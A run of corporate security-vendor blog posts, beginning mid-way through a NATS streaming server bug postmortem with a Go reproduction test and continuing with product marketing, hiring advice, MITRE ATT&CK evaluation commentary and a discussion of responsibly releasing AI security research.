What do we know? To reproduce the bug, it seems important to publish a message but force the subscriber to wait to acknowledge it until after NATS is restarted. We also observe that the subscription ID rarely changes while other subscriptions change each time they subscribe.

Let’s focus on recreating the two specific scenarios we observed in subs.dat.

Theory: There is a race condition in acknowledging messages during a NATS restart when a durable queue resubscribes and is assigned the same subscription ID.
Test: Let’s write a NATS streaming server test to recreate these two conditions.

The NATS streaming server unit test we create must do the following things:

Ensure we’re using the file system store with getTestDefaultOptsForPersistentStore()
Provide the ability to delay message acknowledgement in our QueueSubscribe() callback function
Publish one message
Close down the subscription so that it resubscribes with the same subscription ID after a restart
Restart NATS before the callback attempts to acknowledge it
Resubscribe with a new callback function that will acknowledge messages
Make sure new messages are delivered

We’ll create a new test called TestRedeliveryBug and setup the data store first. It can help us validate that we’ve recreated the two earlier observations from subs.dat. The unit test is shown in full at the end of this blog.

There are two key ingredients to the test derived from our analysis of subs.dat.

First, we need to control how long we take to acknowledge messages in the callback function to recreate the message acknowledgement race condition. This is one of the two important conditions we want to recreate from subs.dat. We’ll send one message and wait 5 seconds before we acknowledge it. This will give us time to restart NATS streaming server.

Second, we need to force the subscriber to reuse the same internal subscription ID. The NATS streaming server Remove() function shown below from server.go from line 858 reuses subscription IDs if the client does not first unsubscribe.

// Remove a subscriber from the subscription store, leaving durable
// subscriptions unless `unsubscribe` is true.
func (ss *subStore) Remove(c *channel, sub *subState, unsubscribe bool)

We want to unsubscribe our callback function in our test so it does not receive data. This is similar to what happens when we restart NATS and the SessBotOpen microservice. We can call closeClient() first, which eventually calls Remove(), to ensure the subscription ID is reused on restart.

After we restart, we resubscribe, acknowledge messages quickly (in 10ms instead of 5s) and publish 20 new messages. If we recreate the bug, none of these messages will get delivered.

Let’s see if we can recreate the bug on v0.9.2 of NATS streaming server.

[vagrant@smp server]$ go test -run TestRedeliveryBug -v 
=== RUN   TestRedeliveryBug
[Test] publishing [seq 0] before restart
[Callback 1] received seq 1 (redelivered = false)
[Test] Restarting NATS
[Test] Waiting for 5 seconds before sending new data...
[Callback 2] received seq 1 (redelivered = true)
[Test] publishing [seq 0] after restart
[Test] publishing [seq 1] after restart
[Test] publishing [seq 2] after restart
[Test] publishing [seq 3] after restart
[Test] publishing [seq 4] after restart
[Test] publishing [seq 5] after restart
[Test] publishing [seq 6] after restart
[Test] publishing [seq 7] after restart
[Test] publishing [seq 8] after restart
[Test] publishing [seq 9] after restart
[Test] publishing [seq 10] after restart
[Test] publishing [seq 11] after restart
[Test] publishing [seq 12] after restart
[Test] publishing [seq 13] after restart
[Test] publishing [seq 14] after restart
[Test] publishing [seq 15] after restart
[Test] publishing [seq 16] after restart
[Test] publishing [seq 17] after restart
[Test] publishing [seq 18] after restart
[Test] publishing [seq 19] after restart
delivered: 1 redelivered: 1
--- FAIL: TestRedeliveryBug (23.59s)
    server_bug_test.go:128: Did not get all redelivered messages
FAIL
exit status 1
FAIL	github.com/nats-io/nats-streaming-server/server	23.606s

Executing TestRedeliveryBug on NATS streaming server v0.9.2

No new messages were delivered to the subscriber when the acknowledgement is delayed after a restart – even after it acknowledged the outstanding message!

Let’s run the same test again against the latest version of NATS streaming server (v0.11.2).

[vagrant@smp server]$ git checkout v0.11.2
Previous HEAD position was 6026da1... Merge pull request #545 from nats-io/prepare_for_next_release
HEAD is now at 7b758bb... Merge pull request #672 from nats-io/new_release
[vagrant@smp server]$ go test -run TestRedeliveryBug -v 
=== RUN   TestRedeliveryBug
[Test] publishing [seq 0] before restart
[Callback 1] received seq 1 (redelivered = false)
[Test] Restarting NATS
[Test] Waiting for 5 seconds before sending new data...
[Callback 2] received seq 1 (redelivered = true)
[Test] publishing [seq 0] after restart
[Callback 2] received seq 2 (redelivered = false)
[Test] publishing [seq 1] after restart
[Test] publishing [seq 2] after restart
[Test] publishing [seq 3] after restart
[Test] publishing [seq 4] after restart
[Test] publishing [seq 5] after restart
[Test] publishing [seq 6] after restart
[Test] publishing [seq 7] after restart
[Test] publishing [seq 8] after restart
[Test] publishing [seq 9] after restart
[Test] publishing [seq 10] after restart
[Test] publishing [seq 11] after restart
[Test] publishing [seq 12] after restart
[Callback 2] received seq 3 (redelivered = false)
[Test] publishing [seq 13] after restart
[Test] publishing [seq 14] after restart
[Test] publishing [seq 15] after restart
[Test] publishing [seq 16] after restart
[Test] publishing [seq 17] after restart
[Test] publishing [seq 18] after restart
[Test] publishing [seq 19] after restart
[Callback 2] received seq 4 (redelivered = false)
[Callback 2] received seq 5 (redelivered = false)
[Callback 2] received seq 6 (redelivered = false)
[Callback 2] received seq 7 (redelivered = false)
[Callback 2] received seq 8 (redelivered = false)
[Callback 2] received seq 9 (redelivered = false)
[Callback 2] received seq 10 (redelivered = false)
[Callback 2] received seq 11 (redelivered = false)
[Callback 2] received seq 12 (redelivered = false)
[Callback 2] received seq 13 (redelivered = false)
[Callback 2] received seq 14 (redelivered = false)
[Callback 2] received seq 15 (redelivered = false)
[Callback 2] received seq 16 (redelivered = false)
[Callback 2] received seq 17 (redelivered = false)
[Callback 2] received seq 18 (redelivered = false)
[Callback 2] received seq 19 (redelivered = false)
[Callback 2] received seq 20 (redelivered = false)
delivered: 20 redelivered: 1
--- PASS: TestRedeliveryBug (8.80s)
PASS
ok  	github.com/nats-io/nats-streaming-server/server	8.813s

Executing TestRedeliveryBug on NATS streaming server v0.11.2

It works as expected! All messages, including the first outstanding message, were delivered to [Callback 2]. We also observed the same behavior in subs.dat by using parse-nats-data on the unit tests file store that was left behind.

We reproduced the bug!

Where was the bug?

Now that we have a reproduction, let’s see where the bug lives. The sendAvailableMessagesToQueue() function in server.go line 4572 is responsible for sending messages to subscriptions.

// Send any messages that are ready to be sent that have been queued to the group.
func (s *StanServer) sendAvailableMessagesToQueue(c *channel, qs *queueState) {
    if c == nil || qs == nil {
        return
    }

    qs.Lock()
    if qs.newOnHold {
        qs.Unlock()
        return
    }
    for nextSeq := qs.lastSent + 1; qs.stalledSubCount < len(qs.subs); nextSeq++ {
        nextMsg := s.getNextMsg(c, &nextSeq, &qs.lastSent)
        if nextMsg == nil {
            break
        }
        if _, sent, sendMore := s.sendMsgToQueueGroup(qs, nextMsg, honorMaxInFlight); !sent || !sendMore {
            break
        }
    }
    qs.Unlock()
}

sendAvailableMessagesToQueue() function in server.go

Note that if qs.newOnHold is true, messages do not get delivered. We observed that updateState() from server.go sets this to true when the two conditions from subs.dat happen to a durable subscription in v0.9.2. It’s never set to false again and new messages never get delivered.

Let’s see why it works in v0.11.2 by finding the same line of code in updateState(). We see this specific code was moved up to the conditional above it in this commit on 3 July 2018.

It was NATS streaming server issue #584 all along! And if we look at the test added for this fix, it’s very similar to our test – only better.

Conclusion

In this postmortem we reviewed the symptoms of an incident that occurred after an upgrade of our cloud customers. We narrowed the problem down to a durable subscriber that was not receiving new messages after a restart. Further analysis of the evidence and code allowed us to reproduce a bug in NATS streaming server.

At Endgame Engineering, we take production incidents seriously. We want to earn the trust of our customers by proving the same problem will not happen twice. These postmortems are opportunities for us to share what we learned, how we improved, and the tools we’ve built with the community.

Here are a few lessons learned.

Debugging is mostly studying code and evidence

Debugging is a discipline. It requires comparing evidence with code (99% of the time it will be code you didn’t write or don’t remember writing). Assumptions in evidence or in how something works may seem like they save you time but they are the enemy of debugging. They will take up more time or worse – you’ll just be wrong.

I still find myself making assumptions. But I have to remind myself I can be wrong but evidence and code usually isn’t.

Tenacity is important

When it comes to delivering customer value -- don’t give up. Especially if you’ll learn something that can be shared with others. We tested three different theories to try and reproduce the bug. After the first two experiments failed, I was almost ready to give up. But there was more unexplored evidence in subs.dat. That was the breakthrough that led to a reproduction.

Code readability is important

This seems obvious, but studying code is so much easier when it’s straightforward and understandable. It’s one of the advantages of using NATS streaming server. It’s very simple and easy to read. Code and design readability helps others, and even your future self, understand what the code is doing so that it can be debugged quickly.

Chaos experiments are important

We need to make a larger investment in chaos experiments to tease out new failures in production. While simplicity matters, it’s important to embrace and navigate the emergent complexity in our systems and organizations.

Today we craft a number of experiments to study failure and build confidence in our ability to withstand turbulent conditions in production at massive scale. This problem showed us we can do more. We’re looking forward to sharing more of this with the community in upcoming blog posts on the topic.

In the meantime, I recommend you watch Casey Rosenthal’s GOTO Chicago 2018 talk, Deprecating Simplicity.

Create tools to find failure

Building tools is an essential part of debugging and experimenting to find failure. In addition to parse-nats-data, we are also sharing another tool we’ve built in Go, aws-logsearch, to search multiple AWS CloudWatch log groups at once on the command line. This allowed our incident responders to quickly validate this problem did not impact other customers.

This postmortem analysis was rewarding. I hope you found it useful.

Appendix: Reproduction Unit Test

The unit test in its entirety to recreate the two conditions we observed from subs.dat is shown below.

package server

import (
    "fmt""testing""time""sync/atomic""github.com/nats-io/go-nats""github.com/nats-io/go-nats-streaming"
)

func TestRedeliveryBug(t *testing.T) {
    // [1] Setup file store for the test
    cleanupDatastore(t)
    defer cleanupDatastore(t)
    opts := getTestDefaultOptsForPersistentStore()

    // Setup channel to signal all messages delivered/redelivered
    ch := make(chan bool, 1)
    delivered := int32(0)
    redelivered := int32(0)

    // Start server and connect to NATS streaming
    s := runServerWithOpts(t, opts, nil)
    defer shutdownRestartedServerOnTestExit(&s)

    sc, nc := createConnectionWithNatsOpts(t, clientName, nats.ReconnectWait(100*time.Millisecond))
    defer nc.Close()
    defer sc.Close()

    // [2] Subscription callback
    //
    // id:        unique ID for callback
    // ackWait:   how long to wait before acknowledging the message in ms
    // totalMsgs: total number of messages we plan on sending
    //
    newCb := func(id int, ackWait int, totalMsgs int) func(m *stan.Msg) {
        return func(m *stan.Msg) {

            // Wait for ackWait milliseconds before acknowledging this message
            fmt.Printf("[Callback %d] received seq %d (redelivered = %t)\n", id, m.Sequence, m.Redelivered)
            time.Sleep(time.Duration(ackWait) * time.Millisecond)
            m.Ack()

            // Count deliveries/redeliveries
            if !m.Redelivered {
                atomic.AddInt32(&delivered, 1)
            } else {
                atomic.AddInt32(&redelivered, 1)
            }

            // Only signal success if the callback after a restart (ID=2) gets all new messages and outstanding messages
            if id == 2 && delivered == int32(totalMsgs) && redelivered == int32(1) {
                ch <- true
            }
        }
    }

    // [3] Publish only one message
    totalMsgs := 1

    // Wait 5 seconds to acknowledge the message
    sub, err := sc.QueueSubscribe(
        "foo",
        "queue",
        newCb(1, 5000, totalMsgs),
        stan.MaxInflight(1),
        stan.SetManualAckMode(),
        stan.DurableName("durable"),
        stan.AckWait(ackWaitInMs(30)))
    if err != nil {
        t.Fatalf("Unexpected error on subscribe: %v", err)
    }

    // Send one message
    for i := 0; i < 1; i++ {
        fmt.Printf("[Test] publishing [seq %d] before restart\n", i)
        if err := sc.Publish("foo", []byte("msg")); err != nil {
            t.Fatalf("Unexpected error on publish: %v", err)
        }
    }

    // [4] Force the client to get the same subscription ID when it resubscribes after a restart
    s.closeClient(clientName)
    s.Shutdown()
    sub.Unsubscribe()

    // [5] Restart server
    s = runServerWithOpts(t, opts, nil)

    sc, nc = createConnectionWithNatsOpts(t, "the_new_me", nats.ReconnectWait(100*time.Millisecond))
    defer nc.Close()
    defer sc.Close()

    // Send 20 new messages
    totalMsgs = 20

    // [6] Resubscribe, acknowledge messages and validate we get all new and redelivered messages
    _, err = sc.QueueSubscribe(
        "foo",
        "queue",
        newCb(2, 10, totalMsgs),
        stan.MaxInflight(1),
        stan.SetManualAckMode(),
        stan.DurableName("durable"),
        stan.AckWait(ackWaitInMs(30)))
    if err != nil {
        t.Fatalf("Unexpected error on subscribe: %v", err)
    }

    fmt.Printf("[Test] Waiting for 5 seconds before sending new data...\n")
    time.Sleep(5000 * time.Millisecond)

    // [7] Send 20 new messages
    for i := 0; i < int(totalMsgs); i++ {
        fmt.Printf("[Test] publishing [seq %d] after restart\n", i)
        if err := sc.Publish("foo", []byte("msg")); err != nil {
            t.Fatalf("Unexpected error on publish: %v", err)
        }
    }

    select {
    case <-ch:
        // All messages were redelivered, we are ok
    case <-time.After(15 * time.Second):
        fmt.Printf("delivered: %d redelivered: %d\n", delivered, redelivered)
        t.Fatal("Did not get all redelivered messages")
    }

    fmt.Printf("delivered: %d redelivered: %d\n", delivered, redelivered)
}

Looking back over 2018, we saw the good and bad that comes with widespread use and abuse of the Internet. Data breaches continued throughout the year, with several in 2018 being among the largest of all time. In the fourth quarter alone, Marriott and Quora announced major breaches affecting 600 million people. And what thanks do we get? Ryuk, a ransomware attack that halted the distribution of some of the nation’s largest newspapers. But it wasn’t all doom and gloom.

A study from Accenture out earlier in the year found that while the number of cyberattacks against organizations have more than doubled, nearly 87 percent of them are prevented. That’s an increase of 17 percent from 2017.

While the Accenture findings demonstrate that organizations are performing better at mitigating the impact of cyberattacks, they still have more work to do. Only two out of five organizations are currently investing in breakthrough technologies like machine learning, artificial intelligence and automation, indicating there is ground to be gained by increasing investment in cyber resilience solutions.

A look back at some of the breakthroughs of 2018

If you follow the cybersecurity industry, you would have been hard pressed to miss MITRE ATT&CK™ last year - the impressive new model of attacker behavior built into advanced endpoint protection technology. Using the ATT&CK framework an organization can assess their visibility against targeted attacks with the tools they already have deployed. In the case of Ryuk, aligning coverage across ATT&CK would enable detection as the adversary is pre-positioning.

Artificial intelligence and machine learning security technologies, combined with human expertise, have rapidly evolved to offer a promising path forward. While machine learning eliminates the failure of signature-based technologies, such as traditional AV, it can simultaneously learn from the behavior of malware inside a network to predict and prevent future attacks. This human-computer interaction is designed to equip security practitioners with the tools they need to better protect their organizations.

With these and other advancements in cyber technology, organizations stand a better chance against attacks than ever before. The challenge now is for the cybersecurity industry to make it easy for organizations to adopt next-generation endpoint protection.

Making endpoint protection as simple as AV

Endgame is proud to lead the market with a completely original and publicly-validated endpoint protection platform. It incorporates AI-backed, natural language understanding technology to reduce the specialized labor bottleneck that security leaders face and enable IT operations personnel to effectively defend their enterprise. Endgame complements this usability with operational flexibility via a delivery model that supports cloud and on-premises options to accommodate the global compliance requirements of complex organizations. And, it’s all run on a single autonomous agent providing both online and disconnected endpoints complete prevention, detection, and response across the MITRE ATT&CK framework.

Endgame is purpose-built to consistently block a wide range of attacks, including those such as Ryuk, which can exploit a new vulnerability and spread rapidly across a network. Our layered prevention technology protects organizations from all forms of targeted and never-before-seen attacks, including ransomware, malware, phishing and fileless attacks.

2019 is the year that enterprises take back the endpoint, demand real time visibility and the assurance of endpoint protection without the operational cost and risk of incessant signature file updates, new modules per attacker technique, and missed exploits. This is the year that attack prevention, and detection and response automation, makes it easy to say yes to AV replacement.

Happy New Year! Before we dive back in, we wanted to take a quick look back at a few of your favorites. Here are our five most popular posts from 2018:

#1 - Putting the MITRE ATT&CK Eval into Context
MITRE published the results of their first public EDR product evaluation.This evaluation is a great achievement from MITRE, and we look forward to working with MITRE on continually refining the process and participating in future tests. As we reflect on the test and what it means, we would like to add some perspective to put the results into context.
Read More

#2 - It’s The Endgame For Phishing
With version 3.0 of the Endgame Protection Platform, Endgame has delivered the best prevention against document-based phishing attacks - the execution of malicious documents attached to email or delivered through social channels.
Read More

#3 - Getting Started with EQL
Event Query Language (EQL) is a language to express relationships between events and additionally has the power to normalize your data regardless of data source and not constrained by platform. Now that EQL has been open-sourced, you too can adopt the language and start writing your own adversarial detections, regardless of underlying technology.
Read More

#4 - Introducing Ember: An Open Source Classifier And Dataset
Ember (Endgame Malware BEnchmark for Research) is an open source collection of 1.1 million portable executable file (PE file) sha256 hashes that were scanned by VirusTotal sometime in 2017. With this dataset, researchers can now quantify the effectiveness of new machine learning techniques against a well defined and openly available benchmark.
Read More

#5 - Detecting Spectre And Meltdown Using Hardware Performance Counters
For several years, security researchers have been working on a new type of hardware attack that exploits cache side-effects and speculative execution to perform privileged memory disclosure. These new vulnerability classes consisted of two distinct flaws named Spectre and Meltdown.
Read More

I recently had a great time as a guest on the CISO/Security Vendor Relationship podcast with David Spark and Mike Johnson, CISO of Lyft. Part of our discussion focused on the challenges of hiring in the security industry. Whether your perspective is that the shortage is real and growing, or that the surge of interest among college entrants just hasn't yet caught up to the demand, the fact remains that security practitioners enjoy one of the lowest unemployment rates of any career. As a security practitioner that has seen the industry evolve over the past decade, our conversation got me thinking about the driving forces behind this shortfall of nearly three million people.

Often, when we discuss the skills gap challenge in cyber security, we focus on finding talented people. There is also a key challenge in retaining those personnel. A 2018 report from ISC, Hiring and Retaining Top Security Talent, reveals a staggering statistic: only 15% of cybersecurity professionals have “no plans” to leave their current employment. That means the majority of your employees, peers and coworkers are ripe for being poached by another company, or even your biggest competitor. While training, well-defined responsibilities and C-suite transparency are all important measures to improve employee satisfaction, it's clear that security managers need to look deeper if they are to meaningfully combat the retention crisis.

At Endgame, we learned quickly that our employees craved the opportunity to solve hard problems - it's why they joined a startup! - but they needed autonomy to discover new, innovative solutions. As a product leader, permitting autonomy could be considered counterintuitive to shipping features quickly, defining what to do and having it built to spec. However, over and over again it has been proven that empowering our team to find the ideal solution to a customer challenge has led to more customer delight and faster feature delivery.

Attract and hire employees that give a shit

Your company values cannot just be aspirational words on a wall, they need to be the star that guides you in hiring, promoting, and even firing. Unless your values are practiced, they are meaningless. Nearly every organization that has a problem with "churn" has a gap between their aspirational and practiced values. And, it almost always starts at the top.

Living by our values, even when it has not been easy or convenient, is what has led to the fantastic culture at Endgame. From the start, we set out to only hire people who lived up to our company values, the core of which is the title of this section. We've had to make some difficult decisions to stay true to those values - from taking a chance on an untested-but-eager recent graduate to letting go of exceptionally capable players who lacked the right attitude. We strive to find and retain people that are mission-focused, and who care about the customer’s problem more than anything else. Passion is the fuel great products are built upon.

Encourage people to fail

That’s right. Let people know it is ok to fail. Our CEO often reiterates, “failing does not make you a failure,” and I could not agree more. The only way to innovate and wow your customers is to strive for new ways to solve their problems. If you foster a this-must-always-work attitude among your team, you will destroy the spark of innovation inside them. Allow them to fail, and to learn, and to grow. Your customers will thank you for the results.

Lead with the “why”

If you are in a leadership position, you should constantly repeat the “why” behind what you ask of your team. People that give a shit do not want to only be told “how” to accomplish the mission. They want to understand why - the core problem we are trying to solve and how can they contribute to fixing it. When you lead with the “why” you allow your team to help discover solutions you may never have considered without collective brainstorming and you allow them to connect their work directly to the value it brings to customers. The Manager Tools series, Leader’s Intent, does a great job of delving into topics such as these.

When you hire mission-focused people, provide them with the autonomy to solve hard problems, and constantly communicate the “why” behind the ask, you will see your retention rate improve. At Endgame, focusing on these themes has brought our retention rate far above industry average, something we are immensely proud of. These principles not only increase retention, but also increase productivity. When employees feel empowered to make decisions because they understand the "why," work - great work - is completed faster.

It’s been 18 months since Endgame became the first endpoint protection vendor to go through a publicly disclosed ATT&CK tactics-based simulation run by the MITRE Corporation. Our early adoption and commitment to the ATT&CK matrix is what makes us the only endpoint protection vendor capable of making nation-state level protection attainable by everyone, regardless of the size or skills of a security team.

Only a year ago, Crowdstrike became the second vendor to jump aboard the MITRE ATT&CK train, and I called on the rest of the industry to use this framework and evaluation to move away from scare-ware marketing and buzzword bingo. See also #nomorenextgen.

And then most recently, in November 2018, MITRE published the raw data associated with their first round of commercial evaluations against the ATT&CK elements used in an APT3-like simulation. Finally, we have some actual data that organizations can use to evaluate and compare the most relevant vendors in the Endpoint Protection space, right? Well, kinda.

Remember when everyone was “Next-gen” and everyone was “Machine Learning”?

It turns out that most organizations don’t want to run their own analysis.

If you kept up with the various vendor responses, you will have noticed that with the exception of one or two vendors, the facts behind the evaluation and usefulness of the data are already starting to get lost among the desperate scrambling for the “ATT&CK certified” tick-box badge of honor. In the same way that “Next-Gen” became the non-sensical feature and capability everyone wanted in 2016, the huge value of ATT&CK is at risk of becoming diluted outside of the practitioner community.

But there are still signs of hope as Forrester prepares to release its independent analysis of the first round of MITRE ATT&CK evaluation data. Forrester’s Josh Zelonis already published the data-gathering python scripts behind the Measuring Vendor Accuracy blog post (which mapped to Endgame’s own analysis). With other analyst firms asking how they can use data in their market research, there are strong indications that ATT&CK is reaching peak adoption outside of the vendor industry.

Without considering your organization's own context, ATT&CK is just another data-point

Although ATT&CK is more useful than any other testing framework that’s come before it, it’s not perfect. You can argue that it rewards vendors who alert on everything, despite the noise and false-positive rate that would make it useless for almost anyone. It doesn’t evaluate how you use the detection data, nor how vendors streamline the response and remediation to a detection. And it doesn’t factor in the financial and human costs associated with actually using the solutions in the same way as the evaluation, such as data storage costs, MDR or managed alerting services, cloud-only analysis, or even the fact that every vendor provided their own dedicated Blue Team to sift through alerts and point out detections that weren’t immediately obvious.

Remember though, post-breach detection is but one part of a capable endpoint protection solution. It doesn’t evaluate the accuracy or effectiveness of the prevention capabilities to stop even the most common initial methods of compromise.

More on that next month when we will look forward to the clickbait machine running overdrive as NSS Labs releases the 2019 AEP test the week of RSA.

I spoke to a few IT leaders around the HIMSS conference last week. All of them expressed both a knowledge of the ATT&CK matrix and recent evaluations, and most of them also confessed to confusion about what really matters. Although they said their teams used the evaluations as part of vendor shortlisting or diligence on their current vendor, few were able to spend time understanding how to interpret the test result data. Even fewer had taken a swipe at analyzing the data published by the ATT&CK team.

So, Jamie Butler (Endgame CTO) and I got together to provide simple but important questions that will be important to everyone looking at the MITRE ATT&CK evaluation data. Most importantly, we wanted to make sure that the questions can be answered by the data.

Rather than asking a one dimensional “Who’s best” – which doesn’t tell you everything, no matter what anyone tells you – we focused on questions that would be key when implementing or operationalizing a new EDR tool. We settled on:

Who missed the most?
When you miss something, can the product find it later?
When you detect, how useful is the data the product gives me?

For full transparency and in case you want to play along with the numbers, I’ve posted the scripts to GitHub here. I’ll add the command to generate the output for every chart as the figure description.

One final grateful shout to Forrester’s Josh Zelonis for publishing his analysis scripts back in December, because he saved me a lot of work. Yay for open source and transparency.

Who missed the most?

^{Figure 1: “python3 total_misses.py”}

This is self-explanatory, and of course no vendor is perfect.

It should be noted that there is no severity rating for the missed TTP. Some may be more severe than others, and some may be mitigated through operational best practices or other security controls.

When you miss something, can you find it later?

Crowdstrike recently published their intelligence report and introduced a new metric they are calling “Breakout” speed – the time from an adversary’s initial successful compromise to the next activity; for example, privilege escalation or lateral movement.

I like to think this relates to the comparable blue team metric “Time to Containment”, so let’s pull some data to look at what APT3 actions were picked up in near-real time, and those that were delayed and introduced a “breakout” window.

^{Figure 2: “python3 delayed.py”}

Obviously, it’s better to detect everything as close to real-time as possible, but let’s be honest – that's not possible; things will get through undetected for a while. That’s where threat hunting comes from.

The way that ATT&CK evaluations interoperates with delayed detections should be very interesting, because in the ATT&CK assessment this meant that the detection data was available but was not immediately raised as an alert. This delay could be due to over reliance on cloud analysis, maybe it was only discovered hours later by a managed service, or perhaps it is because the activity was discovered by skilled threat-hunters.

Essentially, the more delays here, the harder the work to get the detection alert and the bigger risk of a “breakout” window. A large number of delays can leave you with all of the uncertainty of a poorly defined managed service, but none of the benefits of an actual managed service.

Does that mean that a score with ZERO delayed detections is better?

In a word, no. Given that we already understand it may not be possible to prevent or detect everything, you should expect to see some detections that come from the collection of data. In other words, you’d need to hope that the vendors with zero delays detected everything in real-time (go look at total_misses.py again).

Organizations that want to reduce exposure, want to have as many detections that come as close to real-time as possible. Back to the ATT&CK evaluation dataset, let’s pull the number of real-time alerts generated in the evaluation.

^{Figure 3: “python3 real_time.py“}

I don’t think anyone can disagree with real-time alerts being one of the important metrics.

When you detect, how useful is the data you give me?

The hardest part of a buying process is where organizations have to figure out how endpoint protection vendors can actually help them make faster decisions, take faster containment actions, and reduce the risk of damage and loss. You know, the workflow side of things.

How much expertise and work do I have to do to scope, triage and respond with zero disruption?

If a product is throwing up lots of detections but fails to provide the associated events that would help triage and decide on the initial containment step, it’s almost certainly going to be a hard to use product.

Let’s hit the data again to pull the number of detection events that had little context associated.

^{Figure 4: “python3 no_context.py”}

I’ll quote Jamie Butler, our CTO here:

“These contextless, basic telemetry detections only give you a bigger pile of hay/data, so what can you do with it? Can you find the bad thing in a list of thousands of process creation events?”

Can this tell you what really matters?

Yes, well kind of. We already know what matters most in the world of EPP:

Detect more things, faster – You need a good balance of as-real-time-as-possible detections, with low misses.
Find the hard stuff – You need to avoid the low real-time detection rates that are combined with a low (or zero) number of delayed detections. (Are they collecting all of the event data that an EDR tool requires?)
Respond confidently – With too many delayed detections, you must have strong contextual events. If some detection comes in late, you want to act on it fast. Security UX is critical.

We know that without satisfying all three of those, a detection and response/Security Operations function will be very difficult to implement and operationalize successfully – if at all. We can use these three things to make a final pull from the data.

^{Figure 5: "python3 what_matters.py"}

Don’t forget that you can look into the numbers yourself. Grab the data from MITRE and run your own analysis, you can see our scripts here, and you can ask us to show you what really matters, too.

Bar charts. Yay.

To quote our very own Ian McShane (so he doesn’t always have to quote himself), “there are many things US military and commercial organizations don’t have in common: clothes, transportation, hopefully weapons, and seriously different employment agreements.”

But the two things they do have in common are:

MITRE ATT&CK™ - An evolved vision of the adversary must drive protections.

MITRE, as an operator of FFRDCs, has only one customer: the US government. It developed ATT&CK on their behalf to improve knowledge of the modern cyber adversary. The US government was also Endgame’s first customer. We followed closely the development of MITRE’s ATT&CK model and were the first to incorporate it into our research and engineering – ensuring our solutions had the strategic scope and depth to defend an organization that is attacked relentlessly by the most sophisticated adversaries.

The people you have right now, not the people you might get somehow, must be immediately effective against the modern adversary.

There's only one organization that depends on people with minimal domain experience; who they get to keep for only 18 months before they have to start again with new people. Again, same organization, our first customer. With six weeks of basic desktop and network training, and Endgame, they are on the job defending, responding to incidents, and hunting modern adversaries.

Our execution on these two requirements is why today we are a standard advanced endpoint protection solution across the US Department of Defense, and it is why we call Endgame’s solution “military-grade.”

The need for an evolved understanding of the adversary, and for immediate productivity, have converged for all organizations – both government and commercial. Our customers are leaders in commercial verticals including finserv, fintech, healthcare, oil and gas, mining, manufacturing, and higher education.

Endgame is the first and only single agent endpoint prevention, detection and response security solution, with coverage across MITRE ATT&CK, that protects autonomously, and can be operated by the people you already have.

If you’ll be at RSA, we'd be pleased if you would come talk to us at booth 1827 South. Ian McShane, Mark Dufresne, and Mike Nichols, our Product Marketing, Research, and Product Management leaders, will be there with members of their teams to dig into the MITRE evaluation data and other third-party evaluations and show you the product. But really, more than anything, to make best use of your time, we’d love to hear from you on these two questions.

How important is MITRE ATT&CK to your organization? Zero, growing, fundamental?

What impact is the lack of available skills having on your team's ability to protect your organization against modern attacks?

If you’re not at RSA next week, we are as ever, very proud to discuss with you what we do and why, perhaps like never before, our military-grade solution is exactly what you ought to have.

Last week in an unprecedented move, researchers at OpenAI stated that with the announcement of their powerful new language model, they would not be releasing the dataset, code, or model weights due to safety and security concerns. The researchers cited founding principles in the OpenAI charter that predicts that “safety and security concerns will reduce our traditional publishing in the future.” The particular fear is that the GPT-2 model could be misused to generate at scale fake news articles, impersonate others, or for phishing campaigns.

Coincidentally, this news comes almost exactly one year since the release of the Malicious Use of AI Report, co-authored in part by researchers from OpenAI and Endgame. In some security circles such as AI Village, the discussion associated with the GPT-2 model non-release has outweighed that of the initial report. As we noted in our blog post that coincided with the initial report, cybersecurity, with its lack of norms, lies at a critical inflection point in the potential misuse of machine learning in a broad array of fields that includes misinformation (for GPT-2).

Endgame researchers, including authors of this post, have a history of releasing models, datasets, code, and papers that could conceivably be used for malicious purposes. As co-authors with OpenAI on the Malicious Use of AI report, how do we justify these releases? What discussions and checks are in place when choosing to (or not to) release? Is a contraction in the sharing of infosec models and code to be expected?

Deciding to release

Each decision to release should come after a thoughtful debate about potential social and security impacts. In our case, none of our previously released research openly targeted flaws in software products, but rather highlights more generally potential blind spots or other causes of concern. We identified and discussed the costs attackers would need to consider to avoid releasing tools that exploited “low hanging fruit.” Importantly, for each red-team tactic, we also disclosed blue-team defenses.

The series of releases has refined a few guiding principles about responsible release that are worth highlighting:

Invite debate that deliberately includes parties with no vested interest in the code release or publication. Although they need not be fatalists, they can help you walk with fresh eyes through worst-case scenarios.
Adopt long-standing and broadly recognized responsible disclosure guidelines that include early notification of impacted parties, generous time before disclosure, and generally acting in good faith.
Expect and embrace public debate and pushback, which is an important socially-rooted check.
Be willing to give the benefit of the doubt to inventors and authors on their decision to release or withhold. There may be additional details or discussion not made public that contribute to the decision. Even while maintaining the public dialog, don’t fall for the fundamental attribution error in ascribing recklessness, greed or malintent.

Why did we release?

The reality is most AI/ML research can be leveraged for benign or malicious uses. Technologies like DeepFakes highlight that relatively innocuous research can pivot quickly into nightmare territory. For this reason it is important to acknowledge these concerns by committing to guiding principles such as those mentioned above. This is one net positive from OpenAI withholding the release of their GPT-2 model. Not without criticism, it set a precedent and brought the conversation into the public forum.

Let’s take two recent examples from Endgame history where models, tools, and frameworks could have been leveraged by threat actors.

The malware (evasion) gym provided a reinforcement learning approach to manipulate malicious binaries to bypass antimalware machine learning models. This certainly constitutes red-team activity, and abiding by the principles above, we also disclosed the best known defense for the attack. In this case, the machine learning model this project targeted was a “likeness” to commercial NGAV products, not a replica. Abiding by the spirit of responsible disclosure, it represented a very early warning proof-of-concept, not a gaping vulnerability. In reality, it would require a large effort to make this sort of attack successful for adversaries. The fact of the matter is that there are significantly easier, and less costly, ways to evade network or endpoint defenses.

EMBER is a benchmark dataset and anti-malware model that was released, in part, for adversarial research, and as such could be misused. Giving an adversary the “source code” to a modern machine learning antimalware architecture certainly can aid an attacker, but as in the other cases, education and transparency for researchers and defenders were ultimately paramount. We strongly believe that it is important to shine a bright light on the strengths and weaknesses of ML technologies in the information security domain. In fact, showing weaknesses in models like EMBER can help Blue teams mitigate risks when facing a team. This game theoretic approach is common across the infosec community and not one ML research should shy away from.

A less liberal future?

Part of the machine learning community is emphasizing reproducibility with open code and model releases. It is all too easy to create a model that’s a little over trained and cherry picked, and the open release mitigates these issues. This is a wonderful aspect that has drawn many to the community, and this is the source of one of the biggest criticisms on OpenAI’s decision to not release the full model. Based on descriptions of the data set size and training cost, it’s less likely that GPT-2 is overtrained. But there is a legitimate call for open release.

